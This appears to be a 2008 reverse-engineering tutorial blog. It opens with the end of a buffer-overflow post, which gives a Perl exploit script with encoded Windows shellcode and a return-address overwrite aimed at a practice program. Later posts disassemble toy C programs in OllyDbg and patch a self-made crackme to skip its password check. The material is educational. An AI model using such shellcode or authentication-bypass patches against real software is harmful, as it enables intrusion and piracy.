Head on over to metasploit.com, choose shellcode, click demonstration version, filter modules to os::win32, pick “Windows Execute Command” and type “calc.exe” into the CMD field and hit the “generate payload” button.

copy and paste the shellcode into your perl script like so, removing the C’s and adding $shellcode to the command line arguments:

#!/usr/local/bin/perl
$buffer = "A"x256;  #fills up the variable space
$buffer .= "A"x4;   #should overwrite the ebp address
$buffer .= "\x7B\x46\x86\x7C";   #should overwrite the return address with 7C86467B
$shellcode =
"\x2b\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xe2".
"\x61\xf1\x91\x83\xeb\xfc\xe2\xf4\x1e\x89\xb5\x91\xe2\x61\x7a\xd4".
"\xde\xea\x8d\x94\x9a\x60\x1e\x1a\xad\x79\x7a\xce\xc2\x60\x1a\xd8".
"\x69\x55\x7a\x90\x0c\x50\x31\x08\x4e\xe5\x31\xe5\xe5\xa0\x3b\x9c".
"\xe3\xa3\x1a\x65\xd9\x35\xd5\x95\x97\x84\x7a\xce\xc6\x60\x1a\xf7".
"\x69\x6d\xba\x1a\xbd\x7d\xf0\x7a\x69\x7d\x7a\x90\x09\xe8\xad\xb5".
"\xe6\xa2\xc0\x51\x86\xea\xb1\xa1\x67\xa1\x89\x9d\x69\x21\xfd\x1a".
"\x92\x7d\x5c\x1a\x8a\x69\x1a\x98\x69\xe1\x41\x91\xe2\x61\x7a\xf9".
"\xde\x3e\xc0\x67\x82\x37\x78\x69\x61\xa1\x8a\xc1\x8a\x91\x7b\x95".
"\xbd\x09\x69\x6f\x68\x6f\xa6\x6e\x05\x02\x90\xfd\x81\x4f\x94\xe9".
"\x87\x61\xf1\x91";

exec "c:\\stuff\\tools\\odbg110\\ollydbg ./overflowme.exe \"$buffer$shellcode\"";

Breaking down this bit of code is something for another day, suffice to say that it goes and opens the calculator. it is called shellcode because usually you would use it to open a shell.  I think it was Aleph1 that coined the phrase in his phrack article “smashing the stack for fun and profit”.

now we’re almost ready – you’ll notice that when running through the above, it still fails miserably….

here is where I admit my lack of patience to find out why – I know it fails because the registers contain the wrong values but I don’t know why adding 7 NOP’s prior to the shellcode starting fixes it.  anyway – I’ll come back to that I guess.

so our final shellcode is as follows:

#!/usr/local/bin/perl
$buffer = "A"x256;  #fills up the variable space
$buffer .= "A"x4;   #should overwrite the ebp address
$buffer .= "\x7B\x46\x86\x7C";   #should overwrite the return address with 7C86467B
$buffer .= "\x90"x7;
$shellcode =
"\x2b\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xe2".
"\x61\xf1\x91\x83\xeb\xfc\xe2\xf4\x1e\x89\xb5\x91\xe2\x61\x7a\xd4".
"\xde\xea\x8d\x94\x9a\x60\x1e\x1a\xad\x79\x7a\xce\xc2\x60\x1a\xd8".
"\x69\x55\x7a\x90\x0c\x50\x31\x08\x4e\xe5\x31\xe5\xe5\xa0\x3b\x9c".
"\xe3\xa3\x1a\x65\xd9\x35\xd5\x95\x97\x84\x7a\xce\xc6\x60\x1a\xf7".
"\x69\x6d\xba\x1a\xbd\x7d\xf0\x7a\x69\x7d\x7a\x90\x09\xe8\xad\xb5".
"\xe6\xa2\xc0\x51\x86\xea\xb1\xa1\x67\xa1\x89\x9d\x69\x21\xfd\x1a".
"\x92\x7d\x5c\x1a\x8a\x69\x1a\x98\x69\xe1\x41\x91\xe2\x61\x7a\xf9".
"\xde\x3e\xc0\x67\x82\x37\x78\x69\x61\xa1\x8a\xc1\x8a\x91\x7b\x95".
"\xbd\x09\x69\x6f\x68\x6f\xa6\x6e\x05\x02\x90\xfd\x81\x4f\x94\xe9".
"\x87\x61\xf1\x91";

exec "./overflowme.exe \"$buffer$shellcode\"";

you can remove the olly call as I have done above and execute!

we should be rewarded with the following:

and this

and a terminal message stating that we have abnormal program termination.

And we can now do a root dance in celebration.

Next blog we’ll look at what happens when we remove that hard-coded array, reducing the space on the stack, and how we can insert our shellcode prior to the return point.

There is also a follow up article to the one mentioned at the top of this post here http://www.ethicalhacker.net/content/view/165/2/ which also goes into basic buffer overflows.

until next time.

Posted by: nickfnord | October 2, 2008

Binary Analysis Basics Part III

Hello again,

This is yet another session reversing simple c programs in order to see how they work under the hood.

For this session, we’ll need the same tools as before:

A C compiler for windows (I’m using LCC: http://www.cs.virginia.edu/~lcc-win32/)
Ollydbg (http://www.ollydbg.de/)
IDA demo or free (http://www.datarescue.be/downloaddemo.htm)
A good text editor, or you can use the IDE which comes with LCC.
Knowledge of basic programming structure.
Basic knowledge of assembly language.
some familiarity with OllyDbg
knowledge of Hex

This time, the hello world program will be a bit more complex.  There are a number of things I would like to demonstrate here.

1. This program is essentially a crackme.  It’s a very basic one, but there are three different “levels” I guess (for a want of a better word) that we will go through when demonstrating how to crack it.  These three are:
Level1a: identify the password string for a particular login name. (Super easy)
Level1b: Bypass the authentication checking section by patching (easy (and cheating))
Level2: Create a keygen without understanding the algorithm (a bit harder)
Level3: Understand the algorithm just by looking at the source (more difficult but instructive)
2. This is still a simple trial program, but as you’ll see, things just got a whole lot more complicated.  The point of reversing is not always to understand the entire thing and in most cases you can’t because of the size of the program.  We just need to find what we’re looking for and understand a bit of how the program flows.
3. There are two constructs here that were deliberately left out of the previous two examples:  Loops and Functions.
4. In the process of doing the above, we’ll learn a bit more of the functionality of OllyDbg and IDAPro.

The approach we will take is one of an analyst looking at how we can achieve the three levels mentioned above, and as we do, points 2,3 and 4 will be fully explored.  Also note that bypassing a login and gleaning the plain text password as easily as we will do is very unlikely to be possible on a commercial product or the harder crackme’s that you’ll find arround the place.  the purpose of this is to just learn what is possible.

Obviously we have the complete source code available to us for viewing, which we wouldn’t normally have when trying a crackme, but this is a learning excersise.

Now one thing I want to make clear here:  I do not condone bypassing the protection of commercial software just for the sake of using it without paying for it, regardless of whether it is legal or not in whatever country you are in.  The reason we are going through this “crackme” here is to demonstrate binary analysis, with the ultimate goal being complete understanding of the program.

So here’s the Code:

#include <stdio.h>
#include <string.h>
#include <ctype.h>

void keygen(char p[],char c[])
{
int i,j;
char key[] = "NICKFNORD";
//generate password C=p+k(mod26) and check
for(i=0,j=0;i<strlen(p);i++,j++)
{
if(j>=strlen(key))
{
j=0;
}
c[i] = ((toupper(p[i])-65+key[(j)]-65)%26+65);

}
}

int main(void)
{
char username[50];
char password[50];
char correctp[50];
int i,j;

for (i=0;i<50;i++)
{
correctp[i] = '';
password[i] = '';
//username[i] = '';
}

printf("Enter Username:\n");
scanf("%s",username);
printf("Enter Password:\n");
scanf("%s",password);
//find length of username/password, must be 8 characters
if (strlen(username) < 8 | strlen(password) < 8)
{
printf("invalid username/password combination");
return 1;
}

keygen(username,correctp);

if (strcmp(correctp,password)==0)
{
printf("Hello World!\nThank you for logging in %s",username);
}
else
{
printf("invalid username/password combination");
}
return 0;
}

This time, we find that the dissassembly is slightly different – our program is bigger and so there is more to scroll through to get to the bits that we’re interested in.  Instead of just a walkthrough the code this time arround, we’re going to treat this like a crackme and pretend that we havn’t seen the source code above.

So the first thing one would normally do is to run the program to see what we have:

C:\stuff\C>compile hello4

C:\stuff\C>lcc -o hello4.obj hello4.c

C:\stuff\C>lcclnk -o hello4.exe hello4.obj

C:\stuff\C>hello4
Enter Username:
ZZZZZZZZ
Enter Password:
AAAAAAAA
invalid username/password combination
C:\stuff\C>

What we are trying to do for in the first instance here is identify parts of the program code that we can look for in order to know where the starting point of the protection may be.

So we open up in olly.  You’ll notice that although this is still a fairly simple program, there is a bit more complexity.  Olly has done its best to analyse the code and place brackets arround significant blocks but it doesn’t appear clear where any of the messages above come from.  Most crackme’s would also have a GUI which adds even more complexity to the dissassembly, so the easiest way to find your place in a program like this is to search for text strings.

Right click in the main program window -> search for -> all referenced text strings

You’ll see a short list of hard-coded strings that appear in the program:

Seeing our first goal is to bypass the username/password code and get straight to whatever is behind it, we are most interested in what happens after we enter our username and password.  we notice that there are two lines that display our error message.  We can infer from this that there are multiple separate validations occuring that may trigger the error. We do not know which validation check we have triggered.  There are a number of ways forward from here:  We can ignore the fact that we don’t know which check we have triggered and just see what the last one does and try to bypass that or we can trace through from the start of the program to see what happens immediately after the it requests our username/password, but for the moment there is a glaringly obvious place to start:  The line that says “Hello World!Thank you for logging in %s”.  This is what we want to achieve so lets start there and work backwards – Double click on that line in the strings window and olly will take you to the portion of code referencing that string.

00401465  |. 83F8 00        CMP EAX,0
00401468  |. 75 16          JNZ SHORT hello4.00401480
0040146A  |. 8DBD 66FFFFFF  LEA EDI,DWORD PTR SS:[EBP-9A]
00401470  |. 57             PUSH EDI                                 ; /<%s>
00401471  |. 68 AAB04000    PUSH hello4.0040B0AA                     ; |format = "Hello World!Thank you for logging in %s"
00401476  |. E8 A2760000    CALL hello4._printf                      ; \_printf
0040147B  |. 83C4 08        ADD ESP,8
0040147E  |. EB 0D          JMP SHORT hello4.0040148D
00401480  |> 68 D3B04000    PUSH hello4.0040B0D3                     ; /format = "invalid username/password combination"
00401485  |. E8 93760000    CALL hello4._printf                      ; \_printf
0040148A  |. 83C4 04        ADD ESP,4
0040148D  |> B8 00000000    MOV EAX,0

Now we should recognise this construct immediately:

CMP command (or any command that sets the appropriate flags)
Conditional Jump (to start of code block 2)
Code block 1
Unconditional Jump(to line after end of code block 2)
Code block 2

This is an if-test type construct as we have previously seen.

We assume that the program will take our username, generate a correct password from it and compare that one with the one that we entered.  The first place to look for this is immediately prior to the successfull login and failure messages.  In this instance, we can very clearly see that there is a call to strcmp, just prior to the compare command that triggers the conditional jump that we neutralised previously:

00401455  |. 8D7D CA        LEA EDI,DWORD PTR SS:[EBP-36]
00401458  |. 57             PUSH EDI                                 ; /s2
00401459  |. 8D7D 98        LEA EDI,DWORD PTR SS:[EBP-68]            ; |
0040145C  |. 57             PUSH EDI                                 ; |s1
0040145D  |. E8 AE790000    CALL <JMP.&CRTDLL.strcmp>                ; \strcmp

We can see that it loads data from storage on the stack (in variables) and pushes them back onto the top of the stack prior to calling the strcmp function.  We can therefore assume that these two strings are going to be our password and the password generated by the program.  The easiest way to check is to set a breakpoint (F2) on line 0040145D and see what the situation is.

run the program (F9) after setting the breakpoint and we can see that the top two lines of the stack are as per below:

0012FEBC   0012FF08  |s1 = "MHBJEMNQ"
0012FEC0   0012FF3A  \s2 = "AAAAAAAA"

So let’s give it a try:

C:\stuff\C>hello4
Enter Username:
ZZZZZZZZ
Enter Password:
MHBJEMNQ
Hello World!
Thank you for logging in ZZZZZZZZ
C:\stuff\C>

… and we see the magic words.

Now at this point it is also trivial to bypass the above if-test entirely.  Ollydbg allows us to make changes to this code and save our changes into another executable. We basically want to remove this if-test, allowing us to get to the Hello World message regardless of what we put in the username and password fields.  to do this, we can do any number of things to stop the code from jumping.  The simplest way to do this is fill the command with NOPs  or Null Operations.

Click on the JNZ line (00401468) and right click -> binary -> fill with NOPs

you should now see this:

00401465  |. 83F8 00        CMP EAX,0
00401468     90             NOP
00401469     90             NOP
0040146A  |. 8DBD 66FFFFFF  LEA EDI,DWORD PTR SS:[EBP-9A]

Now there is one more thing that we should take care of before writing this to another binary file.  if you scroll up, you’ll see the other “invalid username/password combination” string.  Because we don’t know which one we encountered when we ran through the program, we should take this out as well.  The assembly surrounding it is as follows:

00401429  |. 83FF 00        CMP EDI,0
0040142C  |. 74 14          JE SHORT hello4.00401442
0040142E  |. 68 D3B04000    PUSH hello4.0040B0D3                     ; /format = "invalid username/password combination"
00401433  |. E8 E5760000    CALL hello4._printf                      ; \_printf
00401438  |. 83C4 04        ADD ESP,4
0040143B  |. B8 01000000    MOV EAX,1
00401440  |. EB 50          JMP SHORT hello4.00401492
00401442  |> 8D7D 98        LEA EDI,DWORD PTR SS:[EBP-68]

This looks similar to our standard if-then-else test, except this time the second conditional jump goes a very long way away.  if we follow it down, we’ll see that line 00401492 finalises the program and returns to the calling block.  What this looks like is an if-test without an else.  so in pseudo code we can assume that the programmer has written something like:

if EDI <> 0 then
print invalid message
exit program
end if;

in any case, because all we want to do in this case is bypass the invalid message and cause the program not to exit, we simply need to turn that conditional JE into an unconditional JMP.  once again – right click -> assemble.

change the text to

JMP SHORT 00401442

and assemble.

and it should now look like this

0040142C     EB 14          JMP SHORT hello4.00401442

We are now ready to save our changes into a separate executable.

Right-click in the dissassembly window -> copy to executable -> all modifications -> “copy all”.
this will bring up another window with our modified dissassembly.  Right click -> Save file.  change the name to something else.  in this case I’m calling it Hello4patched.exe

Now lets run it and see how it works:

C:\stuff\C>hello4patched.exe
Enter Username:
AAAAAAAA
Enter Password:
ZZZZZZZZ
Hello World!
Thank you for logging in AAAAAAAA

C:\stuff\C>hello4patched.exe
Enter Username:
asdf
Enter Password:
asdf
Hello World!
Thank you for logging in asdf
C:\stuff\C>

Well, hey!  there we go – now that was easy wasn’t it.  With a bare minimum of understanding of the program’s workings we managed to bypass the two sections of security – and heck we didn’t even figure out what either of them actually did.

Now on a very serious note: What I just demonstrated was absolute rubbish:

We didn’t learn anything whatsoever about the program
We still havn’t figured out what algorithm is used to generate the passwords
There is only a miniscule chance that any actual commercial product will allow us to simply bypass an if-test or two in order to get to the main program.
We didn’t actually achieve anything usefull whatsoever in relation to learning how to reverse, with the exception of learning how to patch executables using ollydbg.

The goal here is to be able to understand common constructs and to be able to find what we’re looking for in the dissassembly as fast as possible.

There are quite a few things we need to analyse and find out:

What is that first lot of validation that seems to happen before comparing the strings?
what do the few lines of code before the enter username line do?
What algorithm is used to determine the password?
can we possibly duplicate this algorithm in a program of our own?

We’ll deal with these in the Next blog where we go onto deconstructing loops and looking at Level 2 of the goals mentioned at the start of this blog.

until then.

Nick.

I have to say that I really had to force myself to work through the above so that I could understand it enough to write it down and explain it all to someone else.  The reason being is that IDAPro is seriously better at giving the reverser a good overview of a program flow.

as I was going through the above, I sometimes referenced IDAPro, but I made myself understand what was going on in Olly just to excersise my brain.  after all, I’m not here to crack my own hello world program, I’m here to learn stuff.

Posted by: nickfnord | October 1, 2008

Binary Analysis Basics Part II

In the previous blog, we broke down a couple of simple C programs that we compiled and dissassembled, analysing how such constructs as if-then-else and basic comparisons look when dissassembled. In this one we do the same thing with another fundamental construct:  Arrays.

You will need:

A C compiler for windows (I’m using LCC: http://www.cs.virginia.edu/~lcc-win32/)
Ollydbg (http://www.ollydbg.de/)
IDA demo or free (http://www.datarescue.be/downloaddemo.htm)
A good text editor, or you can use the IDE which comes with LCC.
Knowledge of basic programming structure (you don’t have to know C as I’ll explain the relevant bits).
Basic knowledge of assembly language (just have a read through PCASM first and keep it as a reference).
some familiarity with OllyDbg
knowledge of Hex

The following C code adds a few more complexities that are essential to understand when reversing.

#include <stdio.h>
#include <string.h>
int main(void)
{
char name[20];
char rname[] = "NickFnord";

printf("Enter Name:\n");
scanf("%s",name);

printf("\nThe Array of characters that you entered was: %s\n",name);
printf("Name array starts at: %d\n",name);
printf("first char of array has ascii value of: %d\n",name[0]);

if (strcmp(name, rname) == 0)
{
printf("Hello World\n");
}
else
{
printf("No Greeting for you\n");
}

return 0;
}

The first important thing to understand if you’re new to programming or have only worked in higher level languages, is that strings, such as the two declared above, are actually stored as an array of characters. The second thing to note is that we cannot do a direct comparison of the entire string.  because it is effectively not an actual string now, but an array of characters, we must either compare each character individually, or call a function which does the same.  So we have included the string.h library in order to have access to the strcmp function.  Also note that when you are running this program, the scanf function will only read the first word you type, i.e. it will stop reading your input when it finds a white space.  we could use the “gets” function in order to capture multiple words but we’ll look at that next time.

First, before opening Olly, run the program to see what it outputs.

c:\stuff\C>hello3
Enter Name:
NickFnord

The Array of characters that you entered was NickFnord
Name array starts at: 1245020
first char of array has ascii value of: 78
Hello World

c:\stuff\C>hello3

So let’s take a look under the hood.

004012D4  /$ 55             PUSH EBP
004012D5  |. 89E5           MOV EBP,ESP
004012D7  |. 83EC 20        SUB ESP,20
004012DA  |. 56             PUSH ESI
004012DB  |. 57             PUSH EDI
004012DC  |. 8D7D E2        LEA EDI,DWORD PTR SS:[EBP-1E]
004012DF  |. 8D35 A0B04000  LEA ESI,DWORD PTR DS:[40B0A0]
004012E5  |. B9 0A000000    MOV ECX,0A
004012EA  |. F3:A4          REP MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[ESI]

At line 004012DC we can see that the stack address of EBP-1E is moved into EDI.  Your mileage may vary, but for me, EBP is 0012FF70 and so EDI will be 0012FF52 after that command has been run. This is half-way between two entries on the stack displayed by Olly and as we will find out later, this will store the variable declared at the beginning of the program, containing “NickFnord”.

You’ll notice that at the second LEA on line 004012DF, the program has taken the memory address referring to the constant “NickFnord” and placed it in the register. You can follow it in the dump to see it allong with other constants that have been stored in the program’s data segment. The command “MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[ESI]” transfers the byte referred to by the address stored at ESI into the address stored at EDI but the REP command in front causes this command to be repeated, using the register ECX as a counter and incrementing EDI and ESI each time around.  As the ECX register was set to 0A (or 10 in decimal) in the previous command, we know that it will repeat the MOVS command 10 times moving allong the dump one byte each time and therefore take 10 bytes starting from the memory address stored in ESI (0040B0A0) and place them in turn in the stack, which will now look something like this:

0012FF50   694E1EE0  àNi
0012FF54   6E466B63  ckFn
0012FF58   0064726F  ord.
0012FF5C   0012FF70  pÿ.
0012FF60   0012FF6C  lÿ.
0012FF64   7C910208  ‘|  ntdll.7C910208

The next bit is nothing too complicated:

004012EC  |. 68 48B14000    PUSH hello3.0040B148                     ; /format = "Enter Name:"
004012F1  |. E8 8B760000    CALL hello3._printf                      ; \_printf
004012F6  |. 83C4 04        ADD ESP,4
004012F9  |. 8D7D EC        LEA EDI,DWORD PTR SS:[EBP-14]
004012FC  |. 57             PUSH EDI

This prints out the string stored at 0040B148 and then uses the LEA command to prepare the way for the user’s input.  We’ll notice that the address refered to by EBP-14 is 0012FF5C, which is immediately after the space that was used to store the variable containing NickFnord. This is where our input string will be stored.  As this is now contained in the EDI register, we can guess that the scanf function below will send its output into the EDI register.

004012FD  |. 68 45B14000    PUSH hello3.0040B145                     ; /format = "%s"
00401302  |. E8 A1430000    CALL hello3._scanf                       ; \_scanf
00401307  |. 83C4 08        ADD ESP,8
0040130A  |. 8D7D EC        LEA EDI,DWORD PTR SS:[EBP-14]
0040130D  |. 57             PUSH EDI                                 ; /<%s>
0040130E  |. 68 12B14000    PUSH hello3.0040B112                     ; |format = "The Array of characters that you entered was: %s"
00401313  |. E8 69760000    CALL hello3._printf                      ; \_printf
00401318  |. 83C4 08        ADD ESP,8

When running through this time, I have put “ZZZZZZZZZZ” into the input value to make it a bit easier to distinguish between this value and the constant NickFnord declared earlier.  After this section of code, our stack should look like this:

0012FF50   694E1EE0  àNi
0012FF54   6E466B63  ckFn
0012FF58   0064726F  ord.
0012FF5C   5A5A5A5A  ZZZZ
0012FF60   5A5A5A5A  ZZZZ
0012FF64   7C005A5A  ZZ.|

So the Scanf function will take the input value and insert it into the allocated memory space and append a null terminator.  You can see that the constant “NickFnord” is also appended by a null character.  This fact becomes significant later on when we look at buffer overflows.  What happens if we put in more than the allocated 20 characters? What happens if we overwrite the return address stored in 0012FF74 and cause it to point elsewhere? Our program should really validate the length of the user input information prior to copying it into memory. More on that another time though.

Next bit then:

0040131B  |. 8D7D EC        LEA EDI,DWORD PTR SS:[EBP-14]
0040131E  |. 57             PUSH EDI                                 ; /<%d>
0040131F  |. 68 F8B04000    PUSH hello3.0040B0F8                     ; |format = "Name array starts at: %d"
00401324  |. E8 58760000    CALL hello3._printf                      ; \_printf
00401329  |. 83C4 08        ADD ESP,8
0040132C  |. 0FBE7D EC      MOVSX EDI,BYTE PTR SS:[EBP-14]
00401330  |. 57             PUSH EDI                                 ; /<%d>
00401331  |. 68 CCB04000    PUSH hello3.0040B0CC                     ; |format = "first char of array has ascii value of: %d"
00401336  |. E8 46760000    CALL hello3._printf                      ; \_printf
0040133B  |. 83C4 08        ADD ESP,8

You’ll notice that in this section, the LEA commands again references the start of the user entered array.  This is redundant as this address has already been loaded into EDI.  however you’ll notice the MOVSX command is also referencing the same location in memory, just that this time it is referencing the data rather than loading the effective address and so we know from the above section in the stack that it will return to the user the value 5A or 90 in decimal which is the ASCII value for “Z”.

0040133E  |. 8D7D E2        LEA EDI,DWORD PTR SS:[EBP-1E]
00401341  |. 57             PUSH EDI                                 ; /s2
00401342  |. 8D7D EC        LEA EDI,DWORD PTR SS:[EBP-14]            ; |
00401345  |. 57             PUSH EDI                                 ; |s1
00401346  |. E8 29790000    CALL <JMP.&CRTDLL.strcmp>                ; \strcmp
0040134B  |. 83C4 08        ADD ESP,8
0040134E  |. 83F8 00        CMP EAX,0
00401351  |. 75 0F          JNZ SHORT hello3.00401362

This section prepares the data “NickFnord” and the data that we entered by loading the addresses of them into EDI and the pushing them one after another onto the stack.  You’ll notice something very handy about Olly in that it performs some of the calculations for you in the bit under the program window so when EIP is pointing at 0040133E for example (i.e. about to execute this line) you will notice that Olly tells you the stack address being referred to by EBP-1E, and the null-terminated array stored at that address as well as the current value of EDI:

Stack address=0012FF52, (ASCII "NickFnord")
EDI=0000005A

This makes debugging a whole lot quicker as you don’t have to manually calculate addresses if you want to know what part of the stack to watch.

at the second LEA command your window should display:

Stack address=0012FF5C, (ASCII "ZZZZZZZZZZZZZZZZZZZZ")
EDI=0012FF52, (ASCII "NickFnord")

Showing that it is now loading the string that we entered.

The call to strcmp compares the two arrays of characters and if we step to the next command we see that it has placed a “1″ into the EAX register rather than just changing the zero flag. as a result we merely need to compare the EAX register to a hardcoded 0 in order to set the appropriate flag for jumping.  Once again, in these types of comparisons, 0 = no difference and 1 =  difference. so when a 1 is returned from the strcmp function we know that the strings are different. and since 1<>0 the zero flag is not set and the program execution jumps.  Run the program through again and insert the correct string to prove it for yourself and to see it in action.

00401353  |. 68 BFB04000    PUSH hello3.0040B0BF                     ; /format = "Hello World"
00401358  |. E8 24760000    CALL hello3._printf                      ; \_printf
0040135D  |. 83C4 04        ADD ESP,4
00401360  |. EB 0D          JMP SHORT hello3.0040136F
00401362  |> 68 AAB04000    PUSH hello3.0040B0AA                     ; /format = "No Greeting for you"
00401367  |. E8 15760000    CALL hello3._printf                      ; \_printf
0040136C  |. 83C4 04        ADD ESP,4
0040136F  |> B8 00000000    MOV EAX,0
00401374  |. 5F             POP EDI
00401375  |. 5E             POP ESI
00401376  |. C9             LEAVE
00401377  \. C3             RETN

The remainder of the program is fairly straightforward – as in the previous excersise we see an if-test in action.

Once again, it may be instructive to open the program in IDA to see how it displays it.  I’d recommend running through the progam a couple of times in IDA also to become familiar with it in addition to Olly as they each have their advantages.

Now at this point I was going to compile this C program using another tool and see if there were any differences in the resultant binary, but after downloading Microsoft visual C++, removing its firefox plugin that I didn’t ask for, spending 20 mins hunting around for the damn compile button before realising that I needed to “create a solution” before compiling and then not being able to compile it because it doesn’t recognise the strcmp function I gave it up.  perhaps I’ll do that another time…..

Once again, I hope this has been educational.  Feel free to leave comments!

Nick.

Posted by: nickfnord | September 30, 2008

Binary Analysis Basics

One thing I have found over the couple of times where I have dabbled in reversing, is a common learning strategy for newbies is to get straight into trying crackmes without having a basic understanding of what the hell they’re doing. Guided by poorly written “tuts” or tutorials, often sprinkled liberally with shocking spelling, the tendancy is to try to glean information from seeing it done.  From a random sampling of tutorials found on www.crackmes.de and other places I have found a very large portion of them do not fully explain what is going on and why the reverser chose to put the breakpoint where he/she did. For example, things like: “I put a brake pnt ther becoz my spidy sense told me to lol, u will haf to figar out why 4 urself” happens supprisingly often. Alternatively the tutorial writer doesn’t write a tutorial, merely posts the answer without any guidance on how to arrive at it.  This is fine if you have some experience, but for a newbie it can certainly be frustrating, resulting the newbie being able to at best go through the motions layed out in the tutorial but without understanding what is being done.  Don’t get me wrong, there are some exelent tutorials out there, written by people who care that people are reading and following allong, but they are few and far between.

So in order to avoid this, the strategy that I initially started with this time arround was to learn to program in assembly and then go from there. I had hoped that having a solid understanding of assembly language would assist in reversing.   This has also caused me great frustration to my suprise. The thing is, code written by a human, regardless of the language is compiled by a computer into the most efficient form according to the type of compiler and the optimising options set and sometimes there may be a trade off between things like speed of execution, memory usage and size of the final executable.  Certain mathematical operations, for example may be switched arround and handled in completely different ways than a human would logically expect, and comparisons and jumps changed accordingly or code interleaved in order to get more efficiency of execution.

The end result is that the code that the CPU executes may look entirely different from the code that the human wrote.  And my conclusion therefore is that if your goal is to learn to reverse, teaching yourself to write programs with assembly language will only be usefull up to a certain point.

The ultimate goal of any reversing session is to understand the program flow enough that you could at least write pseudocode describing its functionality.  This level of understanding may not be necessary in all cases depending on your reasons for reversing, but it should still be the goal that you aim for from the start. And so as you will never have the hand-written code to look at, it is more profitable to learn what certain higher level logic looks like after it has been compiled, linked and then dissassembled.

So what I am doing in this post and possibly subsequent posts is going through at a very basic level, the break down of simple instructions as viewed via a dissassembler.

You will need:
————–
A C compiler for windows (I’m using LCC: http://www.cs.virginia.edu/~lcc-win32/)
Ollydbg (http://www.ollydbg.de/)
IDA demo or free (http://www.datarescue.be/downloaddemo.htm)
A good text editor, or you can use the IDE which comes with LCC.
Knowledge of basic programming structure (you don’t have to know C as I’ll explain the relevant bits).
Basic knowledge of assembly language (just have a read through PCASM first and keep it as a reference).
some familiarity with OllyDbg
knowledge of Hex

First we’ll start with the standard Hello World program.

I’m using the command line rather than the gui of LCC because I find it more flexible to work with when just compiling small amounts of code like this.

Install LCC -> right click on “my computer” -> properties -> Advanced tab -> environment variables -> edit the “path” variable and put the directory that you have installed lcc into at the beginning of the line followed by a semicolon e.g. “C:\lcc\bin;”.
Create a file called “compile.bat” in the directory that you will be working in and put the following in it:

lcc -o %1.obj %1.c
lcclnk -o %1.exe %1.obj

Type the following C program into your chosen text editor and save it as hello.c

#include <stdio.h>
int main(void)
{
printf("Hello World\n");
return 0;
}

now you can just type into the command line

compile hello

and it will create a file called hello.exe

This classic program obviously prints “Hello World” out to the screen.  But in order for this seemingly simple task to be accomplished there is far more going under the hood, specifically printf is a function contained in the stdio library which will display information to the screen.  in the completed binary, the entirety of the printf code will be integrated into the binary.

So lets open it up in ollydbg.

As you can see, there’s quite a bit more stuff in there apart from what we’ve written. Notice that you get placed at what Ollydbg thinks is the entry point for the program. The purpose of this example is not to go through this, but to determine what the compiler has done with our code.

Scroll down until you get to the following:

004012D4  /$ 68 A0A04000    PUSH hello.0040A0A0                      ; /format = "Hello World"
004012D9  |. E8 DB5E0000    CALL hello._printf                       ; \_printf
004012DE  |. 83C4 04        ADD ESP,4
004012E1  |. B8 00000000    MOV EAX,0
004012E6  \. C3             RETN

This section of the code pushes the data stored in 0040A0A0 onto the stack and then calls the function printf. You can see what is stored in 0040A0A0 by right clicking on the command in ollydbg and selecting “follow in dump -> Immediate Constant”. This information is set when the program is opened. you can See exactly what the _printf function does by stepping into it during runtime (set a break point at that line and hit f7 to step into the code).

Next we’ll add a bit more complexity and demonstrate a few more things at once:

#include <stdio.h>
int main(void)
{
int num;

if (2==2)
{
printf("Hello World\n");
}
else
{
printf("No Greeting for you\n\n");
}

printf("enter a number\n");
scanf("%d",&num);
if (num==2)
{
printf("number = 2\n");
}
else
{
printf("number <> 2\n");
}

printf("The address of number is: %d and the value is %d",&num, num);

return 0;
}

So lets compile this and open it up in olly.

Again we’ve been placed at the entry point to the program. Scroll down until you see the following:

004012D4   $ 55             PUSH EBP
004012D5   . 89E5           MOV EBP,ESP
004012D7   . 51             PUSH ECX
004012D8   . 57             PUSH EDI
004012D9   . 68 FFB04000    PUSH hello2.0040B0FF                     ; /format = "Hello World"
004012DE   . E8 76760000    CALL hello2._printf                      ; \_printf
004012E3   . 83C4 04        ADD ESP,4
004012E6   . EB 0D          JMP SHORT hello2.004012F5
004012E8   . 68 E9B04000    PUSH hello2.0040B0E9                     ; /format = "No Greeting for you"
004012ED   . E8 67760000    CALL hello2._printf                      ; \_printf
004012F2   . 83C4 04        ADD ESP,4

You can see here that the compiler has made a decision that our if test is not necessary and insted of performing a compare on 2=2, it opts to just always execute the call to prinf with “Hello World” and then puts a JMP command to always skip over the “No Greeting for you” section.  This is a very small, trivial example of the kinds of unexpected things that you’ll find in dissassembled code.  very likely no programmer would compare to constants like we have, but you can see that the program has been omptimised in a way that may not immediately make sense if we don’t have the source code handy.

004012F5   > 68 D9B04000    PUSH hello2.0040B0D9                     ; /format = "enter a number"
004012FA   . E8 5A760000    CALL hello2._printf                      ; \_printf
004012FF   . 83C4 04        ADD ESP,4
00401302   . 8D7D FC        LEA EDI,DWORD PTR SS:[EBP-4]
00401305   . 57             PUSH EDI
00401306   . 68 D6B04000    PUSH hello2.0040B0D6                     ; /format = "%d"
0040130B   . E8 70430000    CALL hello2._scanf                       ; \_scanf
00401310   . 83C4 08        ADD ESP,8
00401313   . 837D FC 02     CMP DWORD PTR SS:[EBP-4],2

This section takes a number entered by the user and compares it.  It’s worth it at this point to set a breakpoint at 004012F5 and step through the program paying close attention to the registers and the stack.

The LEA command is taking the value stored in the address EBP-4 and the following push command is inserting the address value at the top of the stack.

You’ll notice the number you enter is placed in the stack at 0012FF70, yours may be different, but it will always be in the address referenced by the value of EBP-4  so in hex 0012FF70 – 4 = 0012FF6C.

The stack now looks like this

0012FF60   0040B0D6  Ö°@.  ASCII "%d"
0012FF64   0012FF6C  lÿ.
0012FF68   7C910208  ‘|  ntdll.7C910208
0012FF6C   00000002  ...
0012FF70  /0012FFC0  Àÿ.

olly moves the view of the stack according to what is in the ESP register (which was just incremented by 8 in the previous code), you can scroll up and right-click -> lock stack in order to stop it from moving while debugging.

The memory address 0011FF64 now stores the value of the address that contains the number that we just entered.  Something that is important to note at the moment is the difference between a reference to the data stored in a register and reference to the data stored at the memory address that the register holds. They are very different.

